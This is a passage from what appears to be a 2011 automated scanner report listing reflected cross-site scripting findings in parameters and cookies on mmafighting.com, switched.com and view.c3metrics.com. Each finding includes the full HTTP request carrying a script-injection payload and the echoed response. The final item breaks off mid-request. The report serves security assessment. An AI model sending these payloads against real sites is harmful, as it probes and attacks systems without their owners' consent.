Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:33 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:33 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=2c8c6"><script>alert(1)</script>ece380801f8&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=2c8c6"><script>alert(1)</script>ece380801f8&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.237. http://mmafighting.com/traffic/ [cb parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mmafighting.com
Path:   /traffic/

Issue detail

The value of the cb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60895"><script>alert(1)</script>7b903dcee7f was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=151490236560895"><script>alert(1)</script>7b903dcee7f HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:34 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:34 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=151490236560895"><script>alert(1)</script>7b903dcee7f

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=151490236560895"><script>alert(1)</script>7b903dcee7f">
...[SNIP]...

5.238. http://mmafighting.com/traffic/ [lg parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mmafighting.com
Path:   /traffic/

Issue detail

The value of the lg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57334"><script>alert(1)</script>a636181c04a was submitted in the lg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=57334"><script>alert(1)</script>a636181c04a&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:33 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:33 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=57334"><script>alert(1)</script>a636181c04a&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=57334"><script>alert(1)</script>a636181c04a&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.239. http://mmafighting.com/traffic/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mmafighting.com
Path:   /traffic/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2bc9"><script>alert(1)</script>b63b0b4b97c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365&e2bc9"><script>alert(1)</script>b63b0b4b97c=1 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:34 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:34 GMT
Content-length: 355
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365&e2bc9"><script>alert(1)</script>b63b0b4b97c=1

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365&e2bc9"><script>alert(1)</script>b63b0b4b97c=1">
...[SNIP]...

5.240. http://mmafighting.com/traffic/ [os parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mmafighting.com
Path:   /traffic/

Issue detail

The value of the os request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afc84"><script>alert(1)</script>6f0b38780b0 was submitted in the os parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900afc84"><script>alert(1)</script>6f0b38780b0&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:33 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:33 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900afc84"><script>alert(1)</script>6f0b38780b0&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900afc84"><script>alert(1)</script>6f0b38780b0&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.241. http://mmafighting.com/traffic/ [pw parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mmafighting.com
Path:   /traffic/

Issue detail

The value of the pw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8e31"><script>alert(1)</script>4f4b553212a was submitted in the pw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2Fa8e31"><script>alert(1)</script>4f4b553212a&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:34 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:34 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2Fa8e31"><script>alert(1)</script>4f4b553212a&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2Fa8e31"><script>alert(1)</script>4f4b553212a&cb=1514902365">
...[SNIP]...

5.242. http://mmafighting.com/traffic/ [rsv parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mmafighting.com
Path:   /traffic/

Issue detail

The value of the rsv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9694"><script>alert(1)</script>7955c6a01c4 was submitted in the rsv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=a9694"><script>alert(1)</script>7955c6a01c4&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:34 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:34 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=a9694"><script>alert(1)</script>7955c6a01c4&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=a9694"><script>alert(1)</script>7955c6a01c4&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.243. http://mmafighting.com/traffic/ [rv parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mmafighting.com
Path:   /traffic/

Issue detail

The value of the rv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce38"><script>alert(1)</script>d8eb1374456 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=9ce38"><script>alert(1)</script>d8eb1374456&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:33 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:33 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=9ce38"><script>alert(1)</script>d8eb1374456&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=9ce38"><script>alert(1)</script>d8eb1374456&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.244. http://mmafighting.com/traffic/ [t parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mmafighting.com
Path:   /traffic/

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 339ba"><script>alert(1)</script>2c56b47c49f was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js339ba"><script>alert(1)</script>2c56b47c49f&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:32 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:32 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js339ba"><script>alert(1)</script>2c56b47c49f&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js339ba"><script>alert(1)</script>2c56b47c49f&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=15149023
...[SNIP]...

5.245. http://mmafighting.com/traffic/ [tz parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mmafighting.com
Path:   /traffic/

Issue detail

The value of the tz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a79a"><script>alert(1)</script>deb821a73e8 was submitted in the tz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=5a79a"><script>alert(1)</script>deb821a73e8&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:33 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:33 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=5a79a"><script>alert(1)</script>deb821a73e8&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=5a79a"><script>alert(1)</script>deb821a73e8&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.246. http://switched.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://switched.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f206"><script>alert(1)</script>38c73d58ef7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?4f206"><script>alert(1)</script>38c73d58ef7=1 HTTP/1.1
Host: switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 10:55:39 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 11:25:39 GMT
Content-length: 136
Content-type: text/html
Location: http://www.switched.com/?4f206"><script>alert(1)</script>38c73d58ef7=1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://www.switched.com/?4f206"><script>alert(1)</script>38c73d58ef7=1">here.</a>
</body>
</html>

5.247. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload e3ed5<script>alert(1)</script>67ac9eab662 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
